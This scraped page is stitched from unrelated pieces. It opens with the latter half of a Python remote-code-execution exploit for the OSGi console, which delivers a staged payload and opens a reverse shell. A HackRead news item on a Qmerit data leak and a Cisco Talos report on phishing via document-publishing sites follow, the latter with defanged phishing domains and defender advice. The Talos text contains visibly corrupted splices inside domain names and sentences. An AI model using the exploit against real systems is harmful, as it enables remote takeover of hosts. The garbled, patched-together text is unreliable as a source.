the payload delivery...")    sock.send(stage_1)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)def execute_payload(sock):    """    This function executes the second stage of the exploitation.    It sends payload which is responsible for code execution.    """    stage_2 = generate_stage_2()    print("[*] Executing the payload...")    sock.send(stage_2)    sock.recv(BUFFER_SIZE)    sock.recv(BUFFER_SIZE)    print("[+] Payload executed.")def exploit(args, thread):    """    This function sends the multistaged payload to the tareget host.    """    try:        sock = establish_connection(args.rhost, args.rport)        process_handshake(sock)        deliver_payload(sock, args.lhost)        # Join the thread running the HTTP server        # and wait for payload delivery        thread.join()        execute_payload(sock)        sock.close()        print("[+] Done.")    except socket.error as err:        print("[-] Could not connect!")        print(err)        sys.exit()def parse():    """    This fnction is used to parse and return command-line arguments.    """    parser = argparse.ArgumentParser(        prog="OSGi-3.8-console-RCE",        description="This tool will let you open a reverse shell from the "                    "system that is running OSGi with the '-console' "                    "option in versions between 3.8 and 3.18.",        epilog="Happy Hacking! :)",    )    parser.add_argument("--rhost", dest="rhost",                        help="remote host", type=str, required=True)    parser.add_argument("--rport", dest="rport",                        help="remote port", type=int, required=True)    parser.add_argument("--lhost", dest="lhost",                        help="local host", type=str, required=False)    parser.add_argument("--lport", dest="lport",                        help="local port", type=int, required=False)    parser.add_argument("--version", action="version",                        version="%(prog)s 0.1.0")    return parser.parse_args()def main(args):    """    Main fuction.    """    thread = threading.Thread(        target=run_payload_delivery, args=(args.lhost, args.lport))    thread.start()    exploit(args, thread)if __name__ == "__main__":    main(parse())

OSGi 3.18 Remote Code Execution

By Waqas
A massive data leak (585.81 GB) exposed customer information at Qmerit, including home images, charger locations, and potentially…
This is a post from HackRead.com Read the original post: Leading EV Charging Firm Spills Trove of Customer Info in Server Leak

A massive data leak (585.81 GB) exposed customer information at Qmerit, including home images, charger locations, and potentially more – Qmerit took immediate action to secure the data.

Cybersecurity researcher Jeremiah Fowler has uncovered a troubling data exposure incident, yet again drawing attention to broader concerns surrounding data security. Fowler, in collaboration with WebsitePlanet, uncovered a non-password-protected database containing over half a million records, including sensitive customer information and invoices from a prominent American EV services provider.

The exposed database, totalling 585.81 GB in size, contained a trove of documents such as work invoices, price proposals, electrical permits, and surveys, alongside customer-submitted information including images of their homes and charger location details.

According to Fowler’s **blog post**, upon investigation, he identified the data as belonging to Qmerit, a Texas-based company specializing in EV charging infrastructure installation and maintenance since 2016.

Following the responsible disclosure by Fowler, Qmerit swiftly took action to secure the exposed data and initiate an internal investigation. In response to the incident, Qmerit emphasized its commitment to prioritizing security and protecting Personally Identifiable Information (PII). However, the duration of the data exposure and potential unauthorized access remain uncertain, warranting further scrutiny through internal forensic audits.

Screenshot from the exposed records (Screenshot credit: Websiteplanet\_

Fowler clarified that his findings do not imply wrongdoing on Qmerit’s part or suggest imminent threats to customer or contractor safety. However, the incident must be taken as a lesson surrounding the importance of vital data protection measures in protecting customer privacy and maintaining trust in the market.

Despite this incident, Qmerit continues to position itself as a leading player in North America’s EV services industry, boasting partnerships with major automakers and a track record of over 269,000 EV charger installations.

1.  EV Charging Stations at Risk of DoS Attacks
2.  Navigating London’s Free Electric Car Charging Points
3.  Massive Cloud Database Leak Exposes 380 Million Records
4.  US Credit Union Service Leaks Millions of Records and Passwords
5.  Aussie Travel Agency Data Leak Puts Thousands of Tourists at Risk

Leading EV Charging Firm Spills Trove of Customer Info in Server Leak

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks.

Wednesday, March 13, 2024 08:00

*   Cisco Talos Incident Response (Talos IR) has observed the ongoing use of legitimate digital document publishing (DDP) sites for phishing, credential theft and session token theft during recent incident response and threat intelligence engagements.
*   Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate.
*   DDP sites allow adversaries to quickly deploy and decommission malicious documents on a single platform. Talos IR also observed an adversary move between DDP sites within a short period.

Talos IR has responded to several recent incidents in which threat actors used legitimate digital document publishing sites such as Publuu and Marq to host phishing documents as part of ongoing credential and session harvesting attacks. Threat actors have used a similar tactic of deploying phishing lures on well-known cloud storage and contract management sites such as Google Drive, OneDrive, SharePoint, DocuSign and Oneflow. However, DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls. Recent malicious activity observed across these platforms underscores the need for security teams to ensure that phishing protections and user awareness training programs consider these and similar sites.

**Background and observations**

 “Digital Document Publishing sites” refers to websites that allow users to upload and share PDF files in a browser-based flipbook format. Visitors can view an entire PDF by flipping from page to page without downloading the document, and some DDP sites offer features that allow other types of interaction with the document. Examples of DDP sites include Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo and SimpleBooklet.

The sites discussed in this blog are not malicious. Rather, they are being abused by threat actors.

**Delivery mechanism**

Threat actors integrate DDP sites as a secondary or intermediate stage of the attack chain, which follows tried-and-true phishing methods.

*   The victim receives an email containing a link to a document hosted on a legitimate DDP site. The email’s subject and/or body often includes the phrase “New Document from \[sender organization\],” and leaves the “To” header blank. Instead, the actors load the target list into the “BCC” field.
*   The DDP-hosted document includes a link to an external, adversary-controlled site.
*   When clicked, the link either moves the victim directly to the adversary-controlled site, or through a series of redirects. Talos IR also observed the inclusion of Cloudflare CAPTCHAs as part of some redirects, an adversary technique reported by Cofense, Netskope and other security teams over the past six months.
*   The victim arrives at the adversary-controlled site, which mimics a legitimate authentication page and is designed to capture user credentials or session tokens during authentication.

Attacks leveraging DDP sites for credential and session token theft often take place through unauthorized access to another legitimate email inbox. In a sort of “cascading” business email compromise (BEC) process, the threat actor creates infrastructure and phishing lures to target a specific victim, then leverages that victim’s established connections to conduct follow-on attacks against other organizations. A portion of the infrastructure created for the original target may be reused, while other portions are recreated to increase the likelihood of success during the subsequent attacks. 

**Lure customization**

DDP sites offer custom capabilities that lend credence to a phishing attack. Not only can the threat actor customize the uploaded phishing document, the web page hosting that document can also be modified. Page customization options include changing the background, banner, border or HTML Title tag. These quick configurations create more convincing lures and are likely to garner a higher click-through rate to the credential harvesting page. 

DDP-hosted lure customization observed during investigation ranged from pages listing the organization name only in the HTML Title tag, to a highly customized lure and landing page combination targeting users of a Canadian telecom provider. In the latter case, the final credential harvesting page was a near replica of the provider’s legitimate user login page, though it was hosted on an unrelated webwave\[.\]dev subdomain. 

**Historical trends**

Expanding the scope of the investigation to include historical data reveals a possible trend where threat actors migrate between DDP sites or rapidly activate and deactivate similar campaigns on the same site over time. For example, Talos IR observed a cluster of activity on SimpleBooklet from late October to early November 2020, and another on RelayTo in early September 2023. More recently, an adversary was observed operating the same credential-harvesting attack, first on Publuu, then later Issuu. 

**Adversary advantages create challenges for defenders**

DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack. Given some of these advantages, threat actors may find DDP sites as useful as creating spoofed domains or compromising legitimate sites for phishing and credential theft.

**DDP sites offer low-cost, transient file hosting**

Many DDP sites offer either a free tier or a no-cost trial period where a defined number of files can be published for a limited time. No-cost trial periods usually require only limited personal identifiers and no payment methods. Threat actors can quickly and easily create multiple free accounts, with a varying number of malicious pages per account.

Some DDP sites also allow a link expiration to be set for published content. This feature creates a “set it and forget it” capability for threat actors, who are no longer required to closely track where phishing documents have been deployed so they can be decommissioned. Instead, a link expiration date and time is configured during page creation, ensuring the content will be rendered unavailable automatically, usually after only a short time.

Talos IR observed instances where an adversary launched, then disabled a DDP page in fewer than 24 hours, and others where the DDP page was left active but the final landing page on the adversary-controlled domain was removed through DNS fast fluxing or another mechanism.

This transient nature of DDP pages creates challenges for security teams and complicates the incident response process. While it’s possible to detect, create internal alerts for, and/or notify security personnel about a DDP-hosted lure, the brief availability of the pages creates a compressed response time for defenders. Understanding the theme of the lure, the associated adversary-controlled domains, and the intent of the attack in such a short time may be difficult, even for experienced security teams.

**DDP sites usually have a favorable web reputation.**

The ratio of legitimate to compromised pages hosted on DDP sites is likely quite low. While that ratio seemed to vary by DDP provider, Talos IR found that most pages created recently across all DDP sites hosted legitimate content. Unless this trend continues to shift toward hosting greater volumes of malicious content, these sites will maintain a favorable reputation score and are less likely to be included in automated blocklists. 

A favorable web reputation score may also mislead users who investigate the DDP site using popular open-source intelligence tools or a basic internet search, leading to higher click and credential capture rates than sites with an unknown or poor reputation.

**Site**

**Domain Registration**

**Umbrella Unique Visitors Score\***

**Umbrella Reputation Score\*\***

**Publuu**

2019-02-28 (IS)

63

53 (Medium Risk)

**Marq**

2004-06-19 (IS)

76

9 (Low Risk)

**FlipSnack**

2010-06-03 (US)

96

11 (Low Risk)

**Issuu**

2007-04-19 (GB)

100

9 (Low Risk)

**RelayTo**

2013-12-02 (US)

53

58 (Medium Risk)

_\* Umbrella’s Unique Visitors Score is included to illustrate estimated traffic volume per site as of Feb. 2, 2024._

_\*\* Reputation Score as of Feb. 2, 2024._

**DDP productivity features may inhibit malicious link detection.**

Talos IR found that productivity features on at least one DDP site inhibited traditional methods of extracting the true URL from a phishing link. During the investigation of a malicious document hosted on Publuu, a custom sub-menu was displayed when the user right-clicked on the URL. While this sub-menu included options that would benefit legitimate users, it did not provide a clear option to copy the URL behind the “View Online PDF” hyperlink. Further, no tooltip popups appeared to show the URL when hovering over the link. 

**Case studies**

Two recent Talos IR engagements involved the use of a DDP site as part of potential credential and session token-harvesting attacks.

**Publuu**

Several individuals at the targeted organization received phishing emails from a compromised email address belonging to a trusted third-party vendor with the subject, “New Document from \[third-party vendor\]”.

The link included in the body of the email led to a Publuu flipbook, with a URL like https://publuu[.]com/flip-book/[6_digit_identifier]/[6_digit_identifier]. The phishing document was a generic, widely used file observed in similar attacks on other DDP sites. However, while the phishing document was reused, the adversary had modified the Publuu page with the sender organization’s name to lend authenticity to the document.

Clicking the “VIEW ONLINE PDF” link directed the user to a Cloudflare CAPTCHA, a technique described in the publications by Cofense and Netskope linked above. Use of the CAPTCHA likely has a dual purpose, as it both protects the credential harvesting page from automated access while giving the impression of a legitimate site to users who fall victim to the phishing link.

After completing the CAPTCHA, the victim is directed to a convincing replica of a Microsoft 365 authentication page. The URL for the page contains a lengthy alphanumeric string, which may act as an identifier for the visitor. The adversary-controlled domain associated with the authentication page was atlas-aerspace[.]onlineextracted. The customization of the original Publuu page to the target organization in contrast to this unrelated spoofed domain suggests this incident may have been part of a cascading BEC attack.  

Talos IR later identified an attack chain hosted on the Issuu DDP site with similar indicators. The phishing document was nearly identical, though, unlike the Publuu link, this link URL leveraged the Google AMP to Cloudflare CAPTCHA flow described in the Cofense blog. The credential harvest page was ultimately located at the domain aerospace-atlas[.]online and included the same identifier-style URL string as the one observed with the atlas-aerspace[.]online90 days domain.

In aggregate, the following similar domains – all hosted by Cloudflare – were registered within 90 days. The first two domains were found to be associated with phishing lures hosted on DDP sites, suggesting an effort to target users of the legitimate atlas-aerospace[.]com domain.

*   aerospace-atlas[.]online (registered Jan. 24, 2024)
*   atlas-aerspace[.]online (registered Dec. 19, 2023)
*   atlas-aerspace[.]com (registered Oct. 25, 2023)

Talos provided notification through established channels so affected organizations could review and address this activity.

**Marq**

Talos IR also responded to an incident involving the Marq DDP site. The Marq page hosting the phishing document had already been deactivated, but Talos IR used other forensic data to determine the URL of the associated credential harvesting page. The first part of that URL was https[:]//mvnwsenterprise[.]top:443/aadcdn.msauth.net/.

While the Marq page could not be accessed, Talos IR identified similar pages through open- and closed-source intelligence. These pages were customized to show the sender organization in the HTML Title tag (displayed in the browser tab) but otherwise used an identical “Microsoft365 Online Fax” lure. Unlike some activity clusters on other DDP sites, each page was configured with a unique URL using the .top top-level domain, such as onedrivesmncs[.]top, onedrivemwsamc[.]top, and 347nsm239mws934[.]top. Another common characteristic was the presence of the URL query string tkmilric in all URLs embedded in the phishing document. 

Once clicked, the link passed the user to the spoofed Microsoft authentication page, which resided at the redirect.cgi path of the unique \`.top\` domain. The URL query string for this page included a “ref” parameter, which contained a Base64 and URL encoded value. An example of the decoded value is:

https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https://outlook.office.com/owa/&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code id_token&scope=openid&msafed=1&msaredir=1&client-request-id=**[REDACTED]**&protectedtoken=true&claims={"id_token":{"xms_cc":{"values":["CP1"]}}}&nonce=**[REDACTED]**&state=**[REDACTED]**

The value 00000002-0000-0ff1-ce00-000000000000 found in the client_id and resource parameters is the Microsoft Application ID for Office 365 Exchange Online. The claims string {"id_token":{"xms_cc":{"values":["CP1"]}}} is a required component for a client application to communicate its capabilities to Microsoft Entra ID in an OAuth 2.0 authorization flow. These characteristics likely indicate a campaign to capture session tokens for Microsoft 365 components using the same lure and customized or DGA-generated domains.

**Other DDP Sites**

Following these investigations, Talos IR identified similar activity on other DDP sites. The following examples are provided to demonstrate similarities across DDP sites and are not related to any ongoing or prior Talos IR investigations.

**Flipsnack**

Talos IR identified at least two lure formats used recently on FlipSnack – one eFax PDF-themed lure, and one SharePoint PDF-themed lure. Both landing pages had been removed by the adversary at the time of Talos IR’s review, but the URL for the adversary-controlled page associated with the SharePoint lure (afurrytailwedding[.]com/cure/MSthOffice/index.phpexcept) could indicate a potential Microsoft 365 credential harvesting effort. Neither lure had been customized to target a specific victim. 

**Issuu**

Malicious documents found on Issuu were very similar to those observed on Publuu, except for minor details like a “Reference” number and the link URL. Of the two links tested by Talos IR, one was redirected through an intermediary site before reaching the landing page. The other leveraged the Google AMP and Cloudflare CAPTCHA flow reported by Cofense. Again, the landing pages for both examples had been removed by the adversary at the time of Talos IR’s review.

**RelayTo**

Talos IR located at least two different phishing lures that had been deployed to the RelayTo site in early September 2023. One of these lures was published repeatedly from multiple RelayTo accounts with modifications to only the name of the associated organization. The link in each lure – https[:]//secure-docsx[.]com/efgh5678 – was the same. The secure-docsx[.]combefore the domain had been registered a week this activity began and was followed by the creation of the secure-docu[.]com domain, with which it shared registrant details.

**SimpleBooklet**

Talos IR could not locate a malicious page on the SimpleBooklet site that had not already been deactivated. However, a review of related URLs in VirusTotal suggests that an adversary made prolific use of this site for phishing and possible credential theft from October 2020 through January 2021.

**Defender actions**

Defenders should consider the following actions to help defend against phishing attacks that leverage DDP sites.

*   Block common DDP sites via border security devices, endpoint detection and response (EDR) like Cisco Secure Endpoint, web content filtering, and/or DNS security controls if access to these sites is not required for normal business operations. If blocking these sites will disrupt normal operations, develop a procedure to ensure malicious domains identified in DDP-hosted phishing lures can be quickly blocked.
*   Configure email security controls to detect and alert on links in emails containing common DDP site URLs.
*   Leverage threat intelligence to quickly identify newly created sites related to known threats – in this case, new DDP sites that may be leveraged by threat actors.
*   Monitor for behavioral trends within the organization’s internal environment that could indicate coordinated malicious activity, including activity to blocked sites.
*   Update user security awareness training to include information about DDP sites and other cloud-hosted phishing attack methods. Reinforce a “see something, say something” mentality when users are uncertain about a site’s legitimacy.

End users can also support defenders by remaining vigilant for documents shared over unusual or uncommon sites, even if those sites are legitimate and have a favorable reputation, and by following their organization’s guidelines for reporting suspicious emails.

Tag

#auth